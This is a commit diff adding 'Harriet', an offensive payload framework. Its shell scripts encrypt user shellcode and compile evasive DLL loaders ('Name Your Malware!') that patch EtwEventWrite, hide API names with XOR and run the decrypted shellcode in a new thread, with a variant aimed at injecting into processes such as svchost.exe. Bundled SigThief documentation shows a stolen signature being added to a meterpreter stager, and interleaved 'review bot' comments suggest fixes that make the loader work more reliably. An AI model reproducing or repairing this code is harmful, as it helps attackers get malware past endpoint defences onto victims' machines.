
Add files via upload

assume-breach 3 anni fa
parent
commit
e6d21de717

+ 68 - 0
Harriet/DLL.sh

@@ -0,0 +1,68 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+     _   _                 _      _   
+    | | | |               (_)    | |  
+    | |_| | __ _ _ __ _ __ _  ___| |_ 
+    |  _  |/ _  | __|  __| |/ _ \ __|
+    | | | | (_| | |  | |  | |  __/ |_ 
+    \_| |_/\__,_|_|  |_|  |_|\___|\__|
+                                                                                
+          **by assume-breach**
+
+A Payload Framework Waiting To Be Signatured"
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE AES Encryption w/ Process Injection DLL"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash Harriet/DLLAES/DLLInj.sh
+
+else 
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi
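Review bot: Option 1 runs `bash Harriet/DLLAES/DLLInj.sh`, but the script this commit adds under `Harriet/DLLAES/` is `DLLAes.sh` (the `DLLInj.sh` it adds lives in `Harriet/DLLInj/`), so the only menu entry points at a path that does not appear in this commit; it should read `bash Harriet/DLLAES/DLLAes.sh`. The test `[ $CHOICE == 1 ]` leaves `$CHOICE` unquoted, so pressing Enter on an empty line makes `[` fail with a syntax error instead of reaching the Invalid-option branch; use `read -r CHOICE` and `if [[ "$CHOICE" == "1" ]]; then`. `WHITE="\e[0;17m"` is not a valid SGR colour code, though nothing here uses it.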

+ 124 - 0
Harriet/DLLAES/DLLAes.sh

@@ -0,0 +1,124 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+  ___   _____ _____   _____                            _           _  ______ _      _     
+ / _ \ |  ___/  ___| |  ___|                          | |         | | |  _  \ |    | |    
+/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| | | | | | |    | |    
+|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` | | | | | |    | |    
+| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| | | |/ /| |____| |____
+\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_| |___/ \_____/\_____/
+                                            __/ | |                                       
+                                           |___/|_|                                       
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp Harriet/DLLAES/xor.py Harriet/DLLAES/Resources/xor.py
+cp Harriet/DLLAES/template.cpp Harriet/DLLAES/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 Harriet/DLLAES/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" Harriet/DLLAES/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/DLLAES/Resources/template.cpp
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-19} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-16} | head -n 1 > shell.txt
+Random4=$(cat shell.txt)
+sed -i "s/Random4/$Random4/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-14} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-4} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" Harriet/DLLAES/Resources/template.cpp
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-2} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" Harriet/DLLAES/Resources/template.cpp
+
+#VIRTUALALLOC VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" Harriet/DLLAES/Resources/template.cpp
+
+#XOR FUNCTION VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" Harriet/DLLAES/Resources/template.cpp
+
+#XOR KEY VALUE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-15} | head -n 1 > shell.txt
+XOR_KEY=$(cat shell.txt)
+sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLAES/Resources/template.cpp
+sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLAES/Resources/xor.py
+
+#XOR KEY VARIABLE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-17} | head -n 1 > shell.txt
+XOR_VARIABLE=$(cat shell.txt)
+sed -i "s/XOR_VARIABLE/$XOR_VARIABLE/g" Harriet/DLLAES/Resources/template.cpp
+rm shell.txt
+
+#VIRTUALALLOC - XOR String
+echo VirtualAlloc > virt.txt
+python3 Harriet/DLLAES/Resources/xor.py virt.txt > virtalloc.txt
+virt=$(cat virtalloc.txt)
+virt2="${virt::-8}" 
+sed -i "s/VIRALO/$virt2/g" Harriet/DLLAES/Resources/template.cpp 
+rm virt*
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE Harriet/DLLAES/Resources/template.cpp -fpermissive -Wno-narrowing >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
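Review bot: `rm shell*` near the end deletes every file in the current directory whose name starts with `shell`, which is also the example name the prompt suggests for the user's payload (shellcode.bin) — running the tool from the directory that holds that file destroys it. Name the temporaries explicitly (`rm -f shell.txt shell2.txt shell3.txt shell5.txt`) or create them under `mktemp -d`. Every `fold -w ${1:-8}` reads the script's first positional argument rather than a per-call default, so invoking the script with any argument makes all generated identifiers the same width; write the literal widths. The build line discards compiler output and `***Malware Compiled***` is printed regardless of its exit status; check it (`x86_64-w64-mingw32-g++ … || { echo "compile failed" >&2; exit 1; }`) and quote the user-supplied `"$Shellcode"` and `"$MALWARE"`, which are read without `-r` and expanded unquoted.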

+ 26 - 0
Harriet/DLLAES/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')
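Review bot: The bare `except:` prints the usage line to stdout and calls `sys.exit()` with no code, so a wrong path exits 0 and — because DLLAes.sh redirects this script's stdout into shell.txt and parses it — the usage text is what ends up substituted into the template while the build carries on. Catch the real error and fail loudly: `except OSError as e:` / `print(f"cannot read payload: {e}", file=sys.stderr)` / `sys.exit(1)`. The file handle from `open(sys.argv[1], "rb")` is never closed; `with open(...) as f: plaintext = f.read()` fixes that. `b64encode` is imported but unused.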

+ 68 - 0
Harriet/DLLAES/Resources/template.cpp


+ 32 - 0
Harriet/DLLAES/Resources/xor.py

@@ -0,0 +1,32 @@
+# Red Team Operator course code template
+# payload encryption with XOR
+#
+# author: reenz0h (twitter: @sektor7net)
+
+import sys
+
+KEY = "YnNMojLDpktrJDj"
+
+def xor(data, key):
+	l = len(key)
+	output_str = ""
+
+	for i in range(len(data)):
+		current = data[i]
+		current_key = key[i%len(key)]
+		output_str += chr(ord(current) ^ ord(current_key))
+	
+	return output_str
+
+def printC(ciphertext):
+	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
+
+try:
+    plaintext = open(sys.argv[1], "r").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = xor(plaintext, KEY)
+
+printC(ciphertext)

+ 110 - 0
Harriet/DLLAES/template.cpp

@@ -0,0 +1,110 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+#include <string.h>
+#include <tlhelp32.h>
+
+LPVOID (WINAPI * Virt_Alloc)(  LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
+
+char XOR_VARIABLE []= "XOR_KEY";
+
+unsigned char Random9 []= VIRALO}; 
+
+
+int Random1(char * different, unsigned int different_len, char * key, size_t keylen) {
+        HCRYPTPROV hProv;
+        HCRYPTHASH hHash;
+        HCRYPTKEY hKey;
+
+        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
+                return -1;
+        }
+        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
+                return -1;
+        }
+        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
+                return -1;              
+        }
+        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
+                return -1;
+        }
+        
+        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, different, &different_len)){
+                return -1;
+        }
+        
+        CryptReleaseContext(hProv, 0);
+        CryptDestroyHash(hHash);
+        CryptDestroyKey(hKey);
+        
+        return 0;
+}
+
+
+void RandomA(char * tada, int tada_len, char * XOR_VARIABLE, size_t XOR_VARIABLE_len) {
+        int r;
+        r = 0;
+        for (int i = 0; i < tada_len; i++) {
+                if (r == XOR_VARIABLE_len - 1) r = 0;
+
+                tada[i] = tada[i] ^ XOR_VARIABLE[r];
+                r++;
+        }
+}
+
+int main(void) {
+	
+	void * Random6_mem;
+	BOOL Random8;
+	HANDLE th;
+        DWORD oldprotect = 0;
+	
+	
+	char Random2[] = KEYVALUE
+	unsigned char Random3[] = PAYVAL
+	unsigned int Random7_len = sizeof(Random3);
+	
+	int pido = 0;
+        HANDLE hProc = NULL;	
+	
+	void * addr = GetProcAddress(GetModuleHandle("ntdll.dll"), "EtwEventWrite");
+        VirtualProtect(addr, 4096, PAGE_EXECUTE_READWRITE, &oldprotect);
+
+        #ifdef _WIN64
+        memcpy(addr, "\x48\x33\xc0\xc3", 4);            
+        #else
+        memcpy(addr, "\x33\xc0\xc2\x14\x00", 5);                
+        #endif  
+
+        VirtualProtect(addr, 4096, oldprotect, &oldprotect);
+	
+	strrev(Random3);
+	FreeConsole();
+	strrev(Random3);
+
+	RandomA((char *) Random9, sizeof (Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
+        Virt_Alloc= GetProcAddress(GetModuleHandle("kernel32.dll"), Random9);
+
+	Random6_mem = Virt_Alloc(0, Random7_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+	Random1((char *) Random3, Random7_len, Random2, sizeof(Random2));
+		
+
+	RtlMoveMemory(Random6_mem, Random3, Random7_len);
+	
+
+	Random8 = VirtualProtect(Random6_mem, Random7_len, PAGE_EXECUTE_READ, &oldprotect);
+
+	if ( Random8 != 0 ) {
+			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Random6_mem, 0, 0, 0);
+			WaitForSingleObject(th, -1);
+	}
+	
+	return 0;
+}
+	
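Review bot: The decoded API name in `Random9` has no NUL terminator when it reaches `GetProcAddress` on the `Virt_Alloc =` line: as far as DLLAes.sh shows, the `VIRALO` substitution ends with the last XOR'd byte (the script strips the `};` and the newline entry), so after `RandomA` decodes the 12-byte array, `GetProcAddress` keeps reading into whatever follows in .data and only works if a zero happens to sit there. Decode into a zero-initialised local buffer one byte larger instead, as below. Separately, `Random1` returns on each `Crypt*` failure without releasing the provider, hash or key acquired so far, and because DLLAes.sh builds this file with `-shared`, `main` is not something a DLL loader calls — confirm how the artifact is meant to be executed.
```cpp
	// … unchanged: ETW patch, strrev/FreeConsole …
	char Random9_name[sizeof(Random9) + 1] = {0};   /* +1 keeps a NUL for GetProcAddress */
	memcpy(Random9_name, Random9, sizeof(Random9));
	RandomA(Random9_name, sizeof(Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
	Virt_Alloc = GetProcAddress(GetModuleHandle("kernel32.dll"), Random9_name);
	// … unchanged: allocation, decrypt, thread …
```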

+ 32 - 0
Harriet/DLLAES/xor.py

@@ -0,0 +1,32 @@
+# Red Team Operator course code template
+# payload encryption with XOR
+#
+# author: reenz0h (twitter: @sektor7net)
+
+import sys
+
+KEY = "XOR_KEY"
+
+def xor(data, key):
+	l = len(key)
+	output_str = ""
+
+	for i in range(len(data)):
+		current = data[i]
+		current_key = key[i%len(key)]
+		output_str += chr(ord(current) ^ ord(current_key))
+	
+	return output_str
+
+def printC(ciphertext):
+	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
+
+try:
+    plaintext = open(sys.argv[1], "r").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = xor(plaintext, KEY)
+
+printC(ciphertext)
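Review bot: The bare `except:` swallows every error, prints to stdout and exits 0, so when DLLAes.sh runs this on virt.txt a failure yields an empty virtalloc.txt and the caller's `${virt::-8}` then aborts with a substring-expression error instead of a clear message; use `except OSError as e:`, print to stderr and `sys.exit(1)`. The input is opened in text mode and never closed (`with open(sys.argv[1], "r") as f: plaintext = f.read()`), and `l` in `xor()` is unused. Because the file is read as text, the output has one entry per character including the trailing newline that `echo` adds in the caller, which is why the shell side strips the last entry — that coupling deserves a comment such as `# caller strips the final (newline) entry and the closing "};"`.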

+ 146 - 0
Harriet/DLLInj/DLLInj.sh

@@ -0,0 +1,146 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+______                              _____      _           _   _              ______ _      _     
+| ___ \                            |_   _|    (_)         | | (_)             |  _  \ |    | |    
+| |_/ / __ ___   ___ ___  ___ ___    | | _ __  _  ___  ___| |_ _  ___  _ __   | | | | |    | |    
+|  __/ '__/ _ \ / __/ _ \/ __/ __|   | || '_ \| |/ _ \/ __| __| |/ _ \| '_ \  | | | | |    | |    
+| |  | | | (_) | (_|  __/\__ \__ \  _| || | | | |  __/ (__| |_| | (_) | | | | | |/ /| |____| |____
+\_|  |_|  \___/ \___\___||___/___/  \___/_| |_| |\___|\___|\__|_|\___/|_| |_| |___/ \_____/\_____/
+                                             _/ |                                                 
+                                            |__/                                                  
+
+EOF
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"Enter The Process To Inject To! ex: svchost.exe"${clear}
+echo ""
+read SVCHOST
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+#Copying Templates
+cp Harriet/DLLInj/xor.py Harriet/DLLInj/Resources/xor.py
+cp Harriet/DLLInj/template.cpp Harriet/DLLInj/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+#Getting AES Values
+python3 Harriet/DLLInj/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+#REPLACING VALUES
+cp shell.txt shell2.txt
+
+#AES REPLACEMENTS
+
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" Harriet/DLLInj/Resources/template.cpp
+
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/DLLInj/Resources/template.cpp
+sleep 2
+
+#RANDOM VALUE REPLACEMENTS
+#AESDecrypt
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-20} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" Harriet/DLLInj/Resources/template.cpp
+#FindTarget
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-18} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" Harriet/DLLInj/Resources/template.cpp
+#Inject
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" Harriet/DLLInj/Resources/template.cpp
+#AES KEY
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
+Random4=$(cat shell.txt)
+sed -i "s/Random4/$Random4/g" Harriet/DLLInj/Resources/template.cpp
+#AES Payload
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" Harriet/DLLInj/Resources/template.cpp
+#VIRTUALALLOC VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" Harriet/DLLInj/Resources/template.cpp
+#XOR FUNCTION VARIABLE NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" Harriet/DLLInj/Resources/template.cpp
+
+#Exec VARIABLE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" Harriet/DLLInj/Resources/template.cpp
+
+#PROCESS NAME VARIABLE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-6} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" Harriet/DLLInj/Resources/template.cpp
+
+#XOR KEY VALUE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-15} | head -n 1 > shell.txt
+XOR_KEY=$(cat shell.txt)
+sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLInj/Resources/template.cpp
+sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLInj/Resources/xor.py
+
+#XOR KEY VARIABLE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-17} | head -n 1 > shell.txt
+XOR_VARIABLE=$(cat shell.txt)
+sed -i "s/XOR_VARIABLE/$XOR_VARIABLE/g" Harriet/DLLInj/Resources/template.cpp
+
+
+#VIRTUALALLOC - Variable Name
+cat /proc/sys/kernel/random/uuid | sed 's/[-]//g' | head -c 20 > virtualalloc.txt
+VIRT_ALLOC=$(cat "virtualalloc.txt")
+sed -i "s/Alloc_Virtual/$VIRT_ALLOC/g" Harriet/DLLInj/Resources/template.cpp
+rm virt*
+
+#VIRTUALALLOC - XOR String
+
+echo VirtualAlloc > virt.txt
+python Harriet/DLLInj/Resources/xor.py virt.txt > virtalloc.txt
+virt=$(cat virtalloc.txt)
+virt2="${virt::-8}" 
+sed -i "s/VIRALO/$virt2/g" Harriet/DLLInj/Resources/template.cpp 
+rm virt*
+
+#PROCESS STRING
+
+echo $SVCHOST > proc.txt
+python Harriet/DLLInj/Resources/xor.py proc.txt > proc2.txt
+process=$(cat proc2.txt)
+process2="${process::-8}" 
+sed -i "s/PROCY/$process2/g" Harriet/DLLInj/Resources/template.cpp 
+rm proc*
+
+
+#Compiling Malware
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE Harriet/DLLInj/Resources/template.cpp -lcomctl32 -Wl,--subsystem,windows -fpermissive -Wno-narrowing >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
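Review bot: The two XOR steps call `python Harriet/DLLInj/Resources/xor.py` while the AES step uses `python3`; on a host with no `python` executable those commands fail, virtalloc.txt and proc2.txt stay empty, and `${virt::-8}` / `${process::-8}` abort the script with a substring-expression error rather than a useful message — use `python3` for all three. The user-supplied values are read without `-r` and expanded unquoted (`$Shellcode`, `$SVCHOST`, `$MALWARE`); quote them. Compiler output is discarded with `>/dev/null 2>&1` and `***Malware Compiled***` is printed regardless of the exit status; guard it with `x86_64-w64-mingw32-g++ … || { echo "compile failed" >&2; exit 1; }`. `rm shell*` at the end removes every file in the working directory starting with `shell`, including a user's own shellcode.bin if it lives there.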

+ 26 - 0
Harriet/DLLInj/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')
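Review bot: The IV is a fixed block of zeros and the key is printed into the generated source next to the ciphertext, so this AES layer buys signature evasion, not confidentiality — record that so nobody mistakes it for payload protection, e.g. `# zero IV and the key ships inside the binary: obfuscation only, not encryption`. The bare `except:` also hides the real error and exits 0 via `sys.exit()` with no code, which lets DLLInj.sh continue with a shell.txt that holds the usage text instead of key and payload; prefer `except OSError as e:` with a message on stderr and `sys.exit(1)`. `b64encode` is imported but never used.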

+ 116 - 0
Harriet/DLLInj/Resources/template.cpp


+ 32 - 0
Harriet/DLLInj/Resources/xor.py

@@ -0,0 +1,32 @@
+# Red Team Operator course code template
+# payload encryption with XOR
+#
+# author: reenz0h (twitter: @sektor7net)
+
+import sys
+
+KEY = "VqeaEoOtEhVmRBg"
+
+def xor(data, key):
+	l = len(key)
+	output_str = ""
+
+	for i in range(len(data)):
+		current = data[i]
+		current_key = key[i%len(key)]
+		output_str += chr(ord(current) ^ ord(current_key))
+	
+	return output_str
+
+def printC(ciphertext):
+	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
+
+try:
+    plaintext = open(sys.argv[1], "r").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = xor(plaintext, KEY)
+
+printC(ciphertext)

+ 29 - 0
Harriet/DLLInj/SigThief/LICENSE

@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2017, Josh Pitts
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+  list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+  this list of conditions and the following disclaimer in the documentation
+  and/or other materials provided with the distribution.
+
+* Neither the name of the copyright holder nor the names of its
+  contributors may be used to endorse or promote products derived from
+  this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

+ 93 - 0
Harriet/DLLInj/SigThief/README.md

@@ -0,0 +1,93 @@
+# SigThief
+
+New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
+
+Stable tier will have it End of Month August 2021
+
+---
+Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
+https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
+
+https://twitter.com/subTee/status/912769644473098240
+![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
+
+## For security professionals only...
+
+## What is this?
+
+I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
+
+So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
+
+In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
+
+Of course it's **not a valid signature** and that's the point!
+
+I look forward to hearing about your results!
+
+
+## How to use
+
+### Usage
+```
+Usage: sigthief.py [options]
+
+Options:
+  -h, --help            show this help message and exit
+  -i FILE, --file=FILE  input file
+  -r, --rip             rip signature off inputfile
+  -a, --add             add signautre to targetfile
+  -o OUTPUTFILE, --output=OUTPUTFILE
+                        output file
+  -s SIGFILE, --sig=SIGFILE
+                        binary signature from disk
+  -t TARGETFILE, --target=TARGETFILE
+                        file to append signature too
+  -c, --checksig        file to check if signed; does not verify signature
+  -T, --truncate        truncate signature (i.e. remove sig)
+```
+
+### Take a Signature from a binary and add it to another binary
+```
+$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
+Output file: /tmp/msftesting_tcpview.exe
+Signature appended. 
+FIN.
+```
+
+### Save Signature to disk for use later
+```
+$ ./sigthief.py -i tcpview.exe -r                                                        
+Ripping signature to file!
+Output file: tcpview.exe_sig
+Signature ripped. 
